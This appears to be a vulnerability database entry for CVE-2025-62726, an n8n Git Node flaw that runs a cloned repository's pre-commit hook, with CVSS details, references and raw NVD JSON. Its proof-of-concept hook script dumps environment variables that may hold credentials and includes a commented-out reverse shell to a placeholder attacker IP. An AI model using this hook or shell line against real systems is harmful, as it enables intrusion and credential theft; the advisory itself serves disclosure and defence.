Security Vulnerability Report
CVE-2025-62726 CVSS 8.8 HIGH

CVE-2025-62726

Published: 2025-10-30 17:15:40
Last Modified: 2025-12-31 02:30:18

Description

n8n is an open source workflow automation platform. Prior to 1.113.0, a remote code execution vulnerability exists in the Git Node component available in both Cloud and Self-Hosted versions of n8n. When a malicious actor clones a remote repository containing a pre-commit hook, the subsequent use of the Commit operation in the Git Node can inadvertently trigger the hook’s execution. This allows attackers to execute arbitrary code within the n8n environment, potentially compromising the system and any connected credentials or workflows. This vulnerability is fixed in 1.113.0.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:* - VULNERABLE
n8n < 1.113.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# Malicious pre-commit hook for CVE-2025-62726
# This PoC demonstrates the vulnerability in n8n Git Node
# Place this file in .git/hooks/pre-commit of a malicious repository
# When victim performs commit operation in n8n Git Node, this hook will be executed
echo "Pre-commit hook triggered!" >> /tmp/pwned.log
# Example: Exfiltrate environment variables (may contain credentials)
env > /tmp/n8n_env_$(date +%s).log
# Example: Execute reverse shell
# bash -i >& /dev/tcp/attacker_ip/port 2>&1 &
# Example: Modify n8n workflows
# curl -X POST http://localhost:5678/rest/workflows -H "Content-Type: application/json" -d '{"name":"Malicious Workflow","nodes":[],"connections":{}}'
echo "Compromised n8n environment via pre-commit hook"

References

Patch: https://github.com/n8n-io/n8n/commit/5bf3db5ba84d3195bbe11bbd3c62f7086e090997
Issue Tracking: https://github.com/n8n-io/n8n/pull/19559
Vendor Advisory (Patch): https://github.com/n8n-io/n8n/security/advisories/GHSA-xgp7-7qjq-vg47

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62726", "sourceIdentifier": "[email protected]", "published": "2025-10-30T17:15:39.563", "lastModified": "2025-12-31T02:30:18.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "n8n is an open source workflow automation platform. Prior to 1.113.0, a remote code execution vulnerability exists in the Git Node component available in both Cloud and Self-Hosted versions of n8n. When a malicious actor clones a remote repository containing a pre-commit hook, the subsequent use of the Commit operation in the Git Node can inadvertently trigger the hook’s execution. This allows attackers to execute arbitrary code within the n8n environment, potentially compromising the system and any connected credentials or workflows. This vulnerability is fixed in 1.113.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-829"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "1.113.0", "matchCriteriaId": "083CFFEC-6B4E-4EE6-8B18-EC0F503F75B6"}]}]}], "references": [{"url": "https://github.com/n8n-io/n8n/commit/5bf3db5ba84d3195bbe11bbd3c62f7086e090997", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/n8n-io/n8n/pull/19559", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-xgp7-7qjq-vg47", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}